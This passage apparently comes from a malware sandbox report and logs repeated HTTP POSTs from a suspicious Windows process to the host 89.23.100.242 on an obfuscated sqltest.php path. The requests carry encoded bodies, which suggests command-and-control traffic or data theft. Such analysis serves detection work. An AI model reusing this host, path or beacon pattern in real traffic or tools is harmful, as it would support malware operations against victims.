                                                                                                Jan 10, 2025 07:58:25.787328959 CET2544OUTData Raw: 5c 51 43 52 5b 5a 53 54 58 5b 57 56 50 52 5b 5b 55 51 5e 5c 54 5d 51 5d 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \QCR[ZSTX[WVPR[[UQ^\T]Q]RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$,??[>?+/>-$X+(?!'(0/=*&>$3*'_!/Y.
                                                                                                Jan 10, 2025 07:58:26.134363890 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:26.285588980 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:26 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                60192.168.2.44996689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:26.411263943 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:26.767345905 CET2544OUTData Raw: 5c 56 43 52 5e 56 53 57 58 5b 57 56 50 53 5b 5b 55 55 5e 53 54 50 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \VCR^VSWX[WVPS[[UU^STPQ\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',?1\(#8:+X?8'5#? ?Y*/%'$*'_!/Y.
                                                                                                Jan 10, 2025 07:58:27.151107073 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:27.280587912 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:27 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                61192.168.2.44996789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:26.463062048 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:26.814057112 CET2036OUTData Raw: 59 50 46 50 5e 59 56 52 58 5b 57 56 50 52 5b 5a 55 51 5e 59 54 59 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YPFP^YVRX[WVPR[ZUQ^YTYQXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$.!$+."(,?=4X<+'"+ 3)$=$&:'_!/Y.
                                                                                                Jan 10, 2025 07:58:27.200588942 CET25INHTTP/1.1 100 Continue


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                62192.168.2.44997389.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:27.417792082 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:27.767205000 CET2544OUTData Raw: 5c 54 43 5e 5b 5d 56 5f 58 5b 57 56 50 5a 5b 55 55 52 5e 52 54 5b 51 58 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \TC^[]V_X[WVPZ[UUR^RT[QXRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/ ("?]/<4+^<64;U<0*%240'_!/Y.-
                                                                                                Jan 10, 2025 07:58:28.164181948 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:28.294439077 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:28 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                63192.168.2.44997989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:28.433119059 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:28.782846928 CET2544OUTData Raw: 5c 53 46 53 5e 5d 56 56 58 5b 57 56 50 5f 5b 50 55 57 5e 53 54 50 51 59 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \SFS^]VVX[WVP_[PUW^STPQYRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'/?[+=[>%',*U<='<875B'T(3)?"%70'_!/Y.9
                                                                                                Jan 10, 2025 07:58:29.187602043 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:29.339036942 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:29 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                64192.168.2.44999089.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:29.471561909 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:29.829740047 CET2544OUTData Raw: 59 52 46 57 5b 5a 56 56 58 5b 57 56 50 5a 5b 52 55 57 5e 5b 54 5c 51 5c 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YRFW[ZVVX[WVPZ[RUW^[T\Q\RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$8#]([-<,Z,*->= _(4"4/< +?.&+&:'_!/Y.-
                                                                                                Jan 10, 2025 07:58:30.209095001 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:30.336771011 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:30 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                65192.168.2.44999689.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:30.457621098 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:30.814064026 CET2544OUTData Raw: 59 5f 43 50 5e 5a 53 53 58 5b 57 56 50 53 5b 5a 55 51 5e 5f 54 51 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_CP^ZSSX[WVPS[ZUQ^_TQQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$.2/\+-&?(-:)T<<(7!'*3'_)2^3*'_!/Y.
                                                                                                Jan 10, 2025 07:58:31.195014954 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:31.345979929 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:31 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                66192.168.2.45000289.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:31.478198051 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:31.829890966 CET2544OUTData Raw: 59 51 46 55 5e 59 56 55 58 5b 57 56 50 5c 5b 5b 55 54 5e 58 54 5c 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YQFU^YVUX[WVP\[[UT^XT\QZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$/!](&</*<[8<+4\6;T(#++/*B&[+0'_!/Y.
                                                                                                Jan 10, 2025 07:58:32.208966017 CET25INHTTP/1.1 100 Continue


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                67192.168.2.45000889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:32.310082912 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2036
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:32.723364115 CET2036OUTData Raw: 5c 52 46 53 5e 5e 56 53 58 5b 57 56 50 5f 5b 53 55 50 5e 52 54 51 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: \RFS^^VSX[WVP_[SUP^RTQQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR$;;(:?%?,*1S<=#<'!$+#**&8X3*'_!/Y.9
                                                                                                Jan 10, 2025 07:58:33.081465006 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:33.210731983 CET349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:32 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 1e 39 1f 37 2b 0e 1e 26 59 35 57 2e 3c 2d 50 2b 09 37 00 29 04 24 06 29 20 3c 0d 39 2f 0a 0d 21 05 21 14 3c 0c 0b 0f 24 3c 3c 56 27 27 21 59 0c 13 26 59 3f 04 3d 57 3d 2a 3b 07 3f 0f 21 1d 33 33 3b 12 25 3d 25 52 34 3c 2c 5d 3f 2a 3a 09 28 21 39 1f 2d 2a 27 02 2a 2c 2b 0d 33 0c 2a 57 0c 1f 26 54 22 21 22 0f 21 0b 26 5c 25 28 09 56 33 5e 28 1c 26 11 38 03 20 3a 3c 06 2d 5f 37 01 35 3e 34 58 3e 58 39 0a 36 0b 2b 0a 29 3c 20 51 22 0d 22 50 02 30 5d 51 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 9897+&Y5W.<-P+7)$) <9/!!<$<<V''!Y&Y?=W=*;?!33;%=%R4<,]?*:(!9-*'*,+3*W&T"!"!&\%(V3^(&8 :<-_75>4X>X96+)< Q""P0]Q0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                68192.168.2.45000989.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:32.454057932 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:32.798728943 CET2544OUTData Raw: 59 51 43 51 5b 5c 56 57 58 5b 57 56 50 5f 5b 5b 55 5c 5e 5d 54 59 51 5f 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YQCQ[\VWX[WVP_[[U\^]TYQ_RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'A8'Z+_((,:(=<)8+5+Q<Y=B%><^3:'_!/Y.9
                                                                                                Jan 10, 2025 07:58:33.235840082 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:33.369803905 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:33 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                69192.168.2.45001789.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:33.514111042 CET507OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Jan 10, 2025 07:58:33.860999107 CET2544OUTData Raw: 59 5f 43 56 5b 5b 53 52 58 5b 57 56 50 59 5b 51 55 53 5e 58 54 59 51 5e 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: Y_CV[[SRX[WVPY[QUS^XTYQ^RVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR',1+-2>6$X,.(=(Y<;45T(3Z),*&-(&*'_!/Y.!
                                                                                                Jan 10, 2025 07:58:34.276427984 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:34.426084042 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:34 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                70192.168.2.45002389.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:34.555908918 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Jan 10, 2025 07:58:34.907839060 CET2544OUTData Raw: 59 54 46 50 5e 5e 53 55 58 5b 57 56 50 53 5b 5a 55 52 5e 5f 54 51 51 5a 52 56 59 50 50 5e 5d 52 59 5e 5b 55 50 57 54 56 5a 5d 53 54 5b 51 5e 5a 5a 5f 5c 5a 44 5f 5b 52 54 5b 5f 59 55 50 51 46 5f 56 5d 5d 5c 58 5b 55 5d 5e 5a 5f 47 5f 5b 57 56 50
                                                                                                Data Ascii: YTFP^^SUX[WVPS[ZUR^_TQQZRVYPP^]RY^[UPWTVZ]ST[Q^ZZ_\ZD_[RT[_YUPQF_V]]\X[U]^Z_G_[WVP[VU\_ZQ\SUZTUR_W\SZRFR\P\PY_]W\ZVTX\]X]^XYU^[[_R^XTXX^_VVUUWZT]U[[R[^Z\[F]^_PQ]RY]VSWPY]PZZSYW_[ZV^]XR'@/0<[>%4]/9=+;?88\5+7^>>1X3*'_!/Y.
                                                                                                Jan 10, 2025 07:58:35.311350107 CET25INHTTP/1.1 100 Continue
                                                                                                Jan 10, 2025 07:58:35.463435888 CET200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 10 Jan 2025 06:58:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 56 40 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=V@[0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                71192.168.2.45002889.23.100.242807860C:\Windows\ShellExperiences\uAsLgsGzSk.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Jan 10, 2025 07:58:35.950889111 CET531OUTPOST /5/UniversalLinux5geo/JavascriptdefaultDle/Centralflower/1DbuniversalBase/CdnApi/8Base/1requestmulti/pollBaseDownloads7/3Apiwindows/AuthPrivateGeneratorProvider/processor/3Tempflower2/multiPipetrack/imageJavascriptprocessDefaultsqltest.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                Host: 89.23.100.242
                                                                                                Content-Length: 2536
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
